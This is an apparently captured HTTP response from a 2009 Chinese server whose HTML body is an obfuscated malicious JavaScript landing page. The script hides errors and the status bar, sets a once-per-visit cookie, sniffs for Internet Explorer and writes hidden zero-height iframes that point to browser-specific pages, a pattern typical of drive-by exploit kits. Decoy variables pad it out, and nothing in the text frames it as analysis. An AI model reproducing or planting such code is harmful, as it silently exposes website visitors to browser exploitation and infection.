HTTP/1.1 200 OK
Content-Length: 897
ETag: "0af81f2593c91:5dd"
Date: Mon, 23 Feb 2009 01:31:20 GMT
Last-Modified: Fri, 20 Feb 2009 06:32:54 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.sll4362.cn/a8/fx.htm
X-Polipo-Date: Mon, 23 Feb 2009 01:41:42 GMT
X-Polipo-Access: Mon, 23 Feb 2009 03:24:11 GMT

<script>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function (){
	return true;
	
}
function init(){var kdslsd="asdcbn";
	window["\x73\x74"+"\x61\x74"+"\x75\x73"]="";
	
}window["\x6f\x6e\x6c\x6f\x61\x64"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
	expires.setTime(expires.getTime()+0*60*60*1000);	
	document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
	var rcaac="d";	
	if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
	{
		
		document.write("");	
		document.write("<IFrame src=Ilink.html width=100 height=0></iframe>");		
		document.write("");		
		
	}
	else {
		
		document.write("");	
		var sdcxcap="ds";	
		document.write("<iframe src=flink.html width=100 height=0></iframe>");var xcfcx="xc";
	}}
var ksp="nishiyizhizhu";var fkasacv="BS";var fkqcacv="BS";var qpqccv="BS";
</script>